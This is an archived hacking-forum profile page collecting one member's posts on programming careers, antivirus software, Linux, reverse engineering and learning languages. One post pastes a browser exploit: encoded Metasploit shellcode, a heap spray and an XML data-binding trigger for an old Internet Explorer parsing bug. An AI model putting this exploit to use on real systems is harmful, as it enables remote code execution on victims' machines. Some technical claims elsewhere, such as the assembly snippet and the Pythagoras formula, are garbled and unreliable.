This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - DoctorT

Pages: [1]
1
General discussion / Re: Front end and back end
« on: October 13, 2015, 06:28:50 PM »
Quote from: kenjoe41 on October 11, 2015, 07:37:31 PM
@Code.Illusionist Don't listen to him. He is saying network hacker and javascript/html/css in the same sentence. He gonna hack your network with javascript and css. He has mastered  C++ templates from the boost lib. He is coding the the website's main backend using C++ [which is ok] but doesn't want to know about html, i wonder how he will present the results of all that processing with his C++ templates to the world. SERIOUS DoctorT.

My say is the same people should do this or have a good communication link between the two team or we are going to have a shitty product out there since these people don't communicate. Again @OP, be happy and celebrate you have the opportunity you have here, unless you are not motivated to learn.

I admit I wasn't clear (a little rushed while making my reply) last time, but I never said I could "hack into (someone's) network using JS/CSS." I am not shitting you, but you can do stuff with Javascript... Here is an exploit I copy-pasted from Stackoverflow's thread about it .

Code: [Select]
html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>
Obviously this exploits some XML parsing bug which is out of the scope of this thread. I am just saying, to be a computer scientist (actual engineer), you need to know shit about your field while also being decent at maths, physics, chemistry and biology where all except maths are irrelevant in your field. Because when you call yourself a programmer, you must be able to code Javascript (can you code a forum software, an actual, functioning software which is the bread and butter of companies like Invision, Internet Brands and then-Jelsoft?, without using Jquery/Javascript? You must be bullshiting) and stuff like that. But I wouldn't work for a company that tells me to create a debugger, then design (color, move stuff, create categories, etc.) for its promotional website. Fuck that.

2
General discussion / Re: Talking about Ghost in the Wires by Kevin Mitnick
« on: October 11, 2015, 05:01:42 PM »
Quote from: Darkvision on October 02, 2015, 06:55:53 AM
im rather sure ive read it..but id have to go look through my collection to see if i have it and then refresh my memory to be sure. That said im a HUGE advocate for reading about old exploits/hacks. Sure many times that "old" hack is so out dated that it will never ever be used again as is, but a well written book or article wont just give exact details for an exploit, but the methodology behind it. methodology is imo one of the most useful things you CAN learn. The more methods at your disposal, the more "thought patterns" the more exploits you are capable of seeing.

Im going to tell a story here :). It is not computer related, but it is hacking related.

So a buddy of mine i played pool with(billards) taught me a interesting game some time back. basically set up for a normal game of 8 ball, break like normal. but after that you use object balls(such as the 7 ball) as your cue ball that MUST hit the cue ball as your object ball before going in a pocket. Meaning you would hit the 7 at the cue ball that MUST strike it, THEN the 7 is allowed to be pocketed. What this does is opens your mind to all sorts of combinations and angles that you would normally not see. Now before i learned this game i was a rather decent player, capable of holding off a barroom full of people for hours on a table. Meaning i was by no means a shabby player. i know "shapes", have good cue control, can hit bank shots/cuts etc. Yet learning this alternate style game GREATLY improved how i viewed object balls on the table. In other words the "style" of play itself is the hack, greatly changing how the game is played/viewed.

Many times an exploit is discovered, someone familiar with old methodologies can see where it tied in for that hack, or in the case of someone finding a discovery many times it will be based off of the methodologies they applied. Basically those shots/hacks were already their, you simply lacked the framework or proper mind set to apply to see them. Learning old HAM radio techniques/phreaking/etc are still just as useful now as they were then, even if the original hack cant be applied, the methodology can.

That's very true my friend.

You know, learning physics, chemistry, biology and mathematics (well, perhaps excluding mathematics which is very important in computer science) will not affect your hacking skills, because for fuck's sake, someone could be an utter idiot incapable of telling the difference between the central nervous system and the sun, yet for some reason able to hack into a digital billboard and display porn (as some hackers did a while ago in Brazill, for reasons nobody will understand, except the band of brothers.) But you know, understanding the anatomy of a centipede (not the nicest creature to look at, but since I have the fear of spiders, I think it's benenficial but scary-as-fuck to perform a surgery at a sun spider.)

You know, able to think like a chemist will able to free your mind from "it's just computers." You know, the table Mendeleev created, that had 63 elements, he even predicted some elements that were not discovered. That was quite unlike Newlands, who thought only some elements existed. You know, when I think about it, Newlands, if he existed in the 21st century, wouldn't have been a mediocre hacker even if he wanted to. He thought the primitive chemistry at his time was "be all end all."

He, unlike Mendeleev, thought that there couldn't be any more compounds than those which were discovered in his lifetime. Furthermore as atomic number wasn't discovered (or perhaps, "used" be more correct) in his lifetime, his system of octaves failed after Ca. Although his failure gave rise to Mendeleev's Peridoic Table, which had its own faults (hydogen in halogen, and isotopes...), but at least he was able to predict Germanium, Scandium and a few others. He knew that there will be several more elements discovered.

From a modern hacker's point-of-view, thinking about it, you are trained to know that exploits can be discovered in every new version of any software. So even if possiblly all exploits able to be exploited in any specific enviroment are discovered, the patches themselves can introduce new exploits. Or new features, optimizations and so-on further modifications in the code.

Just think about it, mathematically, a computer may never be smart as Einstein, or a groundbreaking future physicist that's sucking a plastic nipple right now, but when its programmer knows what Einstein knew at his time combined with the mathematical capabilities of a chemist and open-mindness of a biologist, biochemist, it will sure create some respect for its programmer in the world of science, where computer science isn't much appreciated as E = MC2 formula.

3
General discussion / Re: Front end and back end
« on: October 11, 2015, 04:39:37 PM »
To be honest, although I have never worked as a programmer (but from what I understand from programming blogs), I do think it's strange to develop a web application from scratch over a self-hosted server, and then do the web application's promotional website's HTML/CSS by yourself. Like, really, do you really fucking care about HTML anymore after you have mastered C++ templates from BOOST lib? like, seriously... I understand to be a network hacker you must know some stuff like Javascript/HTML/CSS (the noob stuff) aside from knowing sophisticated stuff like shell socket programming/DNS poisoning etc. But seriously, I wouldn't want to work at a company that'd make me color their website after I just write ten thousand lines of codes in five days for their backend stuff.

4
General discussion / Re: Best os for someone new to Linux?
« on: October 11, 2015, 04:35:19 PM »
I suggest Linux Mint (but to be honest the only other Linux distribution I have used is Ubuntu which was better than Windows technical-wise but I still use Windows 8.1.) But honestly, it's like asking where to go for a free medical checkup hosted at multiple clinics by the hospital staff. Some may be better than the other, but you are sure you won't get any serious casualties and it doesn't cost anything other than the time to reach the clinic.

5
High Quality Tutorials / Re: SQL Injection
« on: October 08, 2015, 05:26:29 PM »
That's a lot of writing. I like writing, especially of computer science. But even for me, writing a topic about damned SQLis is difficult with the thread start explaining what PHP really is and containing a MySQL table right after it. That's some really cool stuff here in this forum.

Thank you, bookmarked (even though, thanks to your ebook section, I have 200 ebooks about hacking.) You deserve a cookie.

6
General discussion / Re: Free Softwares stealing our datas
« on: October 08, 2015, 07:37:20 AM »
I admit that the largest software companies like Microsoft will sell your data even if you pay for their software. But that doesn't make open-source software bad, especially every single software. For example, I don't think MyBB would sell your data to anyone, and there are some privacy policies of open-source software that simply read "We will never sell your data without your permission."

I also love how Java has "sponsered" software pre-checked. They really hope we just click "next next next" without noticing.

7
General discussion / Re: Free Softwares stealing our datas
« on: October 06, 2015, 06:25:13 PM »
Others have smugly questioned why anyone could possibly still be using AVG when there's other, newer, more highly regarded free software on the market such as Panda, Bitdefender or Malwarebytes.

Malwarebytes isn't even an antivirus.... it is an anti-malware. I think everyone over this forum should know the difference between an antivirus and anti-malware which is conceptual programming equal to primary school "science." AVG is the fence and Malwarebytes is the steel door that comes free with a large police dog. (Or just the large dog if you don't pirate the license.)

Panda, I thought, is dead. Who cares about it anymore?

Bitdefender "free" is DEAD just like Panda. It doesn't include official support anymore.

I am not advocating AVG (but I admit I have it installed in my system at the moment of typing this, why? Because I didn't have enough time to download ESET after a fresh OS reinstall and I couldn't keep my system unprotected for long. It is AVG Internet Security but I didn't pay for it.) I am just saying that the article itself has some points deserved to be mocked.

8
General discussion / Re: Mental illness?
« on: October 06, 2015, 06:17:21 PM »
Self-treating OCD and a slowly fading social anxiety that almost evolved into an AvPD (avoidant personality disorder.) Man, fuck being stressed. You know, I am just fifteen yet my beard has some grey hair on it. Let alone of the scalp hair. I've been exercising very hard to reduce stress, just burst one of my blood vessels (two I think actually) last night. My arms are also full of white stretch marks. You know, all because I was mocked at school at the early grades.

9
General discussion / Re: Do you include your malicious code in your portfolio?
« on: September 24, 2015, 04:10:06 PM »
Quote from: Kulverstukas on September 22, 2015, 07:48:37 PM
Why not? hackers (sometimes) get hired by companies for their skill to find bugs their software, which means that he understands them and can fix them, even more he can make protections against it. But ofc there are those that throw those people in jail and claim the company found the bug.
Of course companies hire security professionals. But as Gray Hat Hacking puts it, we currently have no legal backing. But if Valve could put a guy in jail that had simply accessed the source code of Half-Life 2, and had FBI/CIA support (and the whole "I'll interview ya" was FBI's idea) and couldn't get the slightest black mark in the hacking community, how can you expect for Bethesda or Blizzard to not perform such action? Likewise, most managers don't know crap about things they manage. Let alone complicated C# bufferoverflow exploit to be understood by them.

10
General discussion / Re: Do you include your malicious code in your portfolio?
« on: September 22, 2015, 07:11:10 PM »
Deque has pointed out that wording can make a huge difference. Password brute-force simply sounds evil to non-programmer management teams. While "recovery" can have different part of brain activated. Even so, I do not think I would include malware in any portfolio, because honestly, do you think those guys at Blizzard will hire me if they know WoW could be potentially hacked by me? Or, like the guy who was promised the cake at Valve (yes, "the cake is a lie" reference) and then instead swatted by Gab because the source code of HL2 was simply accessed by him.... you know, if this hacker had just shut his mouth and didn't get lucrated to a job in Valve, he wouldn't have faced custody. Do you think the makers of WoW, or even Elder Scrolls Online, would even be slightly pleased to have an active exploit in their game included in the job application by someone that wants to be their employee?

11
General discussion / Re: Easiest programming/scripting language
« on: September 22, 2015, 06:33:15 PM »
In truth, Ruby is more simpler than Python but it is server-side. Think of it as web-hacking. But I do not fancy web-hacking (you know, SQL just makes no sense to someone that is so obsessed with C/C#, and I am not even talking about C++, where the most complex of templates are replaced with "where ABCD*
do XYDZ".) There is a thumb of rule for learning mathematics.

If you learn the most complex theorems and algorithms and corollaries that do not depend upon all but the simplest theorems, and you can calculate the spherical front fact of a pyramid in a few seconds, you'll get 97% in algebra/calculus undergrad courses without even reading the textbooks. Why, because when the teacher is teaching the most basic stuff, you already have trained your brain to be equivalent of the professor, and one-time revision in the class room is enough to get you A++. Because you don't need to be taught Pythogoras theroem when you already know Fermat's Last Theorem , which was unsolved for three and half centuries. Pythogoras is AB + BC = AC (in its simplest form), which is not too hard for you.

Similar is the case for programming. If you start with C (which is, trust me, still one of the most simple programming languages despite it being the father of C++), you'll be like "holy shit, how easy it is in Python!" instead of the vice versa and have Python as first language and say, "HOLY SHIT!!!! So this was the underlying fundamental layer under my simple Python command."

For your required goals, I suggest a multitude of languages.
Obviously C, some C++, C# (managed memory, wheeeeeeeewwwww, thread safety, libraries, whewwwwwww) and Python. Learn in that order, or learn C# before C++.

12
Reverse Engineering / Re: What knowledge do I need to read “The IDA Pro Book”?
« on: September 22, 2015, 06:02:51 PM »
As theWormKill already mentioned, you need to know the language you are going to RE itself. For example, (I have, too, not yet read this book but I assume it teaches IDA and little of RE itself) if you want to reverse-engineer a file on an "x86 IBM PC", you'd need to learn http://www.ibm.com/developerworks/library/l-ia/it.

As for the skills you actually need to learn Assembly (any type), would be....
  • A pretty good brain that should know some subjects like chemistry, physics, etc. but a lot of fourteen year olds can do it, so can you, without a lot of academic qualification.
  • Enthusiasm in computer science. Intermediate (preferably advanced) knowledge in C programming.But you know, the C code printf function changes to
                         global start
    start                            proc near
    jmp near ptr 0x444
    (valid Assembly code but I have no idea what it does) so even an advanced C programmer may have trouble writing small Assembly programs.
There is an old joke in computer programming, "Why did the chicken cross the road," where the Assembly programmer says the chicken had to built the road before crossing it. There is also a "finding the elephant" joke over Stackoverflow where the "Assembly programmer gets on his knees, and searches the entire African continent for an elephant." In the "How to kill a dragon with a programming language," "the Assembly programmer builds his mighty sword with a tens of thousands of needles."

Imagine reversing the code of a script kiddy who wrote his keylogger in Python. In Assembly. There comes a lot of obsufication. And coffee.
[/list]

13
News and Announcements / Re: Board restrictions to new members
« on: September 22, 2015, 05:13:35 PM »
Quote from: ptales on September 22, 2015, 02:56:50 PM
There are enough valuable non-tech related topics everyone can participate in without spamming random shit. It's quite easy to get above 20 posts this way and the effort involved won't hurt anybody.
I think this is a good step.
"We've enough leechers..."
Like most people out here just for the ebooks section, I was pretty disappointed actually. I am a usually HQ poster (that being said, I actually have cut myself from my tiny little fanbase over the internet, and I never have been called a script kiddy, because I do not try to impress people with the humble knowledge of mine) and I was going to post only six-seven months later when the board exams would be over.

Regardless, I hope i am welcomed.

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.